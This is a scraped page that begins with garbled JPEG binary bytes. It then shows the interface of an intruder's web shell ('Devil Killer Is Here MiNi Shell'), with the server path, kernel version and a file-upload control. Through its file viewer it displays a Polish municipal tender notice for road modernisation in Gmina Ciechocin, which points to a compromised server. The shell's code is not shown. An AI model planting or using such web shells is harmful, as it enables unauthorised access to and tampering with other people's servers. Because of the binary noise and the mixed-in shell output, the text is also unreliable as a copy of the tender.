JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220425/0013338001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury drogowej i poprawa bezpieczeństwa ruchu drogowego na terenie Gminy Ciechocin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechocin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciechocin 172</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-408</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566837781</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ciechocin@ciechocin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ciechocin.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury drogowej i poprawa bezpieczeństwa ruchu drogowego na terenie Gminy Ciechocin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b533c829-c475-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00133380</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ciechocin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/ciechocin 2. Składanie dokumentów wpostępowaniu z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,WYŚLIJ WIADOMOŚĆ”<br/>dostępnego na stronie dotyczącej danego postępowania.3. Za datę złożenia dokumentów o których<br/>mowa w ust. 2, przyjmuje się kliknięcie przycisku ”WYŚLIJ WIADOMOŚĆ” po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. 4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych za pośrednictwem platformy zakupowej o której mowa w<br/>ust. 1, opisane zostały w Regulaminie platformazakupowa.pl oraz Instrukcji dla Wykonawców<br/>platformazakupowa.pl, dostępnych na stronie dotyczącej danego postępowania oraz stronie głównej<br/>Platformy pod adresem https://platformazakupowa.pl5. Występuje limit objętości plików lub<br/>spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB. 6. Sposób sporządzenia i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz.U. z 2020 poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządze-nie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem danych osobowych Wykonawcy jest Wójt Gminy Ciechocin, Ciechocin 172, 87 - 408 Ciechocin;<br/>2) inspektorem ochrony danych osobowych w Gminie Ciechocin jest Michał Daczko adres e-mail: odo-serwis@gmail.com<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego w trybie podstawowym pn. „Modernizacja infrastruktury drogowej i poprawa bezpieczeństwa ruchu drogowego na terenie Gminy Ciechocin” - postępowanie nr KIR.271.1.4.2022<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (t.j Dz. U. z 2021 r. poz. 1129 z<br/>póżn. zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekra-cza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautoma-tyzowany, stosowanie do art.<br/>22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych - skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamó-wienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z Zapytaniem ofer-towym i złożoną ofertą oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO - prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu za-pewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycz-nej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub pań-stwa członkowskiego,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIR.271.1.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest realizacja robót budowlanych w ramach zadania pn. „Mo-dernizacja infrastruktury drogowej i poprawa bezpieczeństwa ruchu drogowego na terenie Gminy Cie-chocin”. Celem niniejszego zamówienia jest poprawa bezpieczeństwa ruchu drogowego w Gminie Ciechocin poprzez przebudowę drogi gminnej nr 110428C w miejscowości Małszyce, drogi nr 110413C relacji Ciechocin - Nowa Wieś, drogi nr 110424C, nr 110423C w miejscowości Świętosław, drogi nr 110447C w miejscowości Rudaw, drogi nr 110410C w miejscowości Miliszewy oraz drogi nr 110405C w miejscowości Elgiszewo. Drogi są kluczowymi odcinkami dla zapewnienia spójności komunikacyjnej Gminy Ciechocin oraz zapewniają znacznie bezpieczeństwo lokalnego ruchu pieszo-drogowego.<br/>Szczegółowy wykaz dróg realizowanych w ramach zamówienia: <br/> Droga gminna nr 110428C w miejscowości Małszyce długość 999 m.<br/>Projektowana przebudowa zlokalizowana jest na działce nr 182 - obręb 0003 Małszyce. Na przed-miotowym odcinku droga gminna posiada skrzyżowanie z drogą wojewódzką nr 569 Golub-Dobrzyń – Dobrzejewice. Istniejąca droga gminna w miejscowości Małszyce posiada nawierzchnię utwardzoną kruszywem naturalnym. <br/>Na całym odcinku drogi wyrównanie i wzmocnienie podbudowy a następnie wykonanie warstwy profilowej w celu nadania odpowiednich spadków podłużnych i poprzecznych oraz wykonanie nawierzchni z betonu asfaltowego, wykonanie poboczy, wykonanie zjazdów, montaż oznakowa-nia pionowego, montaż korytek ściekowych, montaż studni rewizyjnej fi 1000 mm, montaż wpu-stu ulicznego, wykonanie drenażu podziemnego w oplocie<br/>Droga gminna nr 110413C relacji Ciechocin - Nowa Wieś długość 600 m.<br/>W zakresie branży drogowej droga gminna na obszarze objętym przebudową posiada nawierzch-nię naturalną, utwardzoną bez widocznych, zaznaczonych poboczy. Szerokość drogi gminnej nr 110413C w stanie istniejącym oscyluje na poziomie 3,5-4,0 m. Droga gminna na odcinku objętym opracowaniem zawiera się poza terenem zabudowanym. Na obszarze objętym przebudową znaj-dują się głównie tereny rolnicze z bardzo mocno rozproszoną zabudową gospodarczą. Zjazdy in-dywidualne, publiczne w głównej mierze posiadają nawierzchnię naturalną ze szlaki oraz z kru-szywa. <br/>W ramach zadania do rozbiórki przewiduje się słup sieci napowietrznej teletechnicznej szt. 1 do dyslokacji. Projekt zakłada wykonanie robót ziemnych, wykonanie warstwy gruntu stabilizowane-go cementem Rm 2,5MPa, wykonanie podbudowy z kruszywa łamanego stabilizowanego mecha-nicznie 0/31,5mm, budowę mijanek, wykonanie skropienia emulsją asfaltową warstw konstruk-cyjnych, wykonanie warstwy wiążącej z AC11W, wykonanie warstwy ścieralnej z AC11S, przebu-dowę istniejących zjazdów indywidualnych, budowę poboczy z mieszanki optymalnej, przebudo-wę kolizji teletechnicznych, wykonanie oznakowania pionowego.<br/>Droga gminna nr 110424C w miejscowości Świętosław długość 880m.<br/>Droga gminna nr 110424C na całym odcinku objętym opracowaniem posiada nawierzchnię utwar-dzona kruszywem wapiennym, gruzem betonowym z pozarastanymi poboczami gruntowymi, za-oranymi przez rolników. Nawierzchnia posiada liczne zadolenia i zagłębienia spowodowane migra-cją drobnych cząstek pod wpływem wody opadowej oraz istniejącego ruchu pojazdów. Droga gminna zaczyna swój początek w miejscu skrzyżowania, z drogą gminną nr 110421C i kończy się na granicy administracyjnej starostwa powiatu toruńskiego. Na odcinku objętym opracowaniem pod drogą nie ma zlokalizowanych żadnych przepustów. Zjazdy w ciągu drogi gminnej na pola nie są widoczne i nie posiadają jakiejkolwiek nawierzchni utwardzonej.<br/>Zakres obejmuje wykonanie nawierzchni bitumicznej, wykonanie podbudowy zasadniczej, wyko-nanie warstwy odsączającej, wykonanie stabilizacji gruntu cementem, wykonanie poboczy z KŁSM.<br/>Droga gminna nr 110423C w miejscowości Świętosław długość 990 m.<br/>Droga gminna nr 110423C na całym odcinku objętym opracowaniem posiada nawierzchnię utwar-dzona kruszywem wapiennym, gruzem betonowym z pozarastanymi poboczami gruntowymi, za-oranymi przez rolników. Nawierzchnia posiada liczne zadolenia i zagłębienia spowodowane migra-cją drobnych cząstek pod wpływem wody opadowej oraz istniejącego ruchu pojazdów. Droga gminna zaczyna swój początek w miejscu skrzyżowania, z drogą powiatową nr 2037C i kończy się na granicy administracyjnej gminy Ciechocin. Na odcinku objętym opracowaniem pod drogą nie ma zlokalizowanych żadnych przepustów. Zjazdy w ciągu drogi gminnej na pola nie są widoczne i nie posiadają jakiejkolwiek nawierzchni utwardzonej. <br/>Zakres obejmuje wykonanie nawierzchni bitumicznej, wykonanie podbudowy zasadniczej z KŁSM 0/31,5mm gr. 20cm, wykonanie warstwy odsączającej gr. 10cm(poszerzenie), wykonanie poboczy z KŁSM 0/31,5 gr. 6 cm z zaklinowaniem 0/16mm.<br/>Droga gminna nr 110447C w miejscowości Rudaw długość 430 m.<br/>Odcinek drogi gminnej zlokalizowany jest w granicach obszaru rozproszonej zabudowy rolnej i mieszkalnej. Droga gminna od początku opracowania skrzyżowanie z drogą powiatową nr 2124 C Ruziec- Paliwodzizna – Nowa Wieś posiada nawierzchnię w bardzo złym stanie technicznym. Po-siada pobocza gruntowe bez rowów. Na chwile obecną nawierzchnia drogi gminnej nie posiada prawidłowego przekroju poprzecznego z uwagi na wstępujące przegięcia, zaniżenia nawierzchni. Na terenie objętym opracowaniem nie występuje zadrzewienie kolidujące z remontem.<br/>Zgodnie z zakresem opracowania i uzgodnieniami z inwestorem założono na całym odcinku drogi wyrównanie i wzmocnienie podbudowy a następnie wykonanie warstwy profilowej w celu nada-nia odpowiednich spadków podłużnych i poprzecznych oraz wykonanie nawierzchni mineralno as-faltowej BA o gr 5 cm, wykonanie poboczy, wykonanie zjazdów, montaż korytek trapezowych.<br/>Droga gminna nr 110410C w miejscowości Miliszewy długość 787 m.<br/>Przebudowa drogi gminnej nr 110410C w miejscowości Miliszewy – etap II. Przebudowywana dro-ga gminna pod względem administracyjnym usytuowana jest na terenie województwa kujawsko – pomorskiego, w obrębie powiatu golubsko - dobrzyńskiego na terenie gminy Ciechocin. Droga przebiega przez miejscowości Miliszewy. Teren niezabudowany charakteryzuje się zabudową ro-dzinną i siedliskową. Miejscowości cechują się wiejskim typem zagospodarowania, przeważa w nich zabudowa mieszkaniowa z udziałem gospodarstw rolnych. Droga w terenie niezabudowanym przebiega przez tereny rolne - uprawowe. Istniejąca droga posiada nawierzchnię gruntową po-wierzchniowo ulepszoną szlaką, gruzem i tłuczniem.<br/>W ramach projektu przebudowy drogi gminnej przewidziano wykonanie nawierzchni powierzch-niowo utrwalonej, wykonanie podbudowy, wykonanie warstwy odcinającej z piasku, wykonanie poboczy, wykonanie oznakowania pionowego.<br/>Droga gminna nr 110405C oraz droga gminna na działce nr 96/1w miejscowości Elgiszewo długość 735 m. <br/>W pasie drogowym zlokalizowana jest sieć teletechniczna, wodociągowa oraz energetyczna. Ze względu na swój powierzchniowy charakter i wykonywanie prac w śladzie istniejącej nawierzchni żadna z wymienionych sieci nie wchodzi w kolizję z planowaną przebudową. W przypadku rozpo-częcia prac należy wykonać zawsze przekopy kontrolne w celu weryfikacji. <br/>Zakres prac obejmuje wykonanie nawierzchni bitumicznej, wykonanie poboczy z KŁSM 0/16mm, budowę zjazdów bitumicznych. <br/>Uwaga: <br/>Przed przystąpieniem do wykonania robót drogowych wynikających ze sporządzonej dokumen-tacji projektowej Wykonawca wykona odcinek próbny o długości 100 m. celem uściślenia organi-zacji wytwarzania i układania oraz ustalenia warunków zagęszczenia warstw zgodnie z zapisami zawartymi w dokumencie - Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, stanowiącym załącznik do SWZ.<br/>Odcinek próbny powinien być zlokalizowany w miejscu uzgodnionym przez Inspektora Nadzoru, po zaakceptowaniu przez Zamawiającego zaproponowanej lokalizacji. Na odcinku próbnym Wy-konawca winien użyć takiej technologii, materiałów oraz sprzętu jakie zamierza stosować pod-czas realizacji zadania wynikającego z wykonanej dokumentacji projektowej oraz podpisanej umowy. Odcinek próbny należy wykonać w pełnej technologii wynikającej z dokumentacji pro-jektowej sporządzonej dla remontowanego odcinka drogi powiatowej (m.in. warstwa wyrów-nawcza, warstwa ścieralna, pobocza).<br/>Wykonawca może przystąpić do realizacji robót po zaakceptowaniu przez Inspektora Nadzoru prawidłowości wykonania odcinka próbnego pod względem technologii wbudowania i zagęsz-czenia.<br/>2.	Zakres robót składających się na przedmiot zamówienia obejmuje w szczególności: <br/>- Roboty przygotowawcze; <br/>-Roboty pomiarowe;<br/>-Roboty ziemne; <br/>-Wykonanie podbudowy; <br/>-Wykonanie nawierzchni; <br/>-Oznakowanie dróg i urządzenie bezpieczeństwa ruchu;<br/>-Wykonanie odcinka próbnego;<br/>-Wykonanie zjazdów.<br/>Przedmiot zamówienia obejmuje również:<br/>-Organizację placu budowy, <br/>-Opracowanie dokumentacji niezbędnej do prawidłowej organizacji i realizacji robót budowla-nych, <br/>-Zabezpieczenie terenu budowy, <br/>-Wykonanie niezbędnych badań i prób, <br/>-Wykonanie geodezyjnej dokumentacji powykonawczej, <br/>-Uporządkowanie terenu po zakończeniu robót. <br/><br/>3.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji zawiera: <br/>1)	dokumentacja projektowa obejmująca projekt budowlano-wykonawczy;<br/>2)	specyfikacja techniczna wykonania i odbioru robót budowlanych, <br/>3)	stała organizacja ruchu;<br/>4)	wzór umowy, <br/>5)	przedmiar robót, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">71351810-4 - Usługi topograficzne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Zamawiający, w oparciu o podane przez Wykonawcę w treści Formularza ofertowego oferowaną ceny za realizację przedmiotu<br/>zamówienia - 60 pkt<br/>b)2. Zamawiający dokona oceny i porównania ofert z zastosowaniem kryterium: Gwarancja - 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span 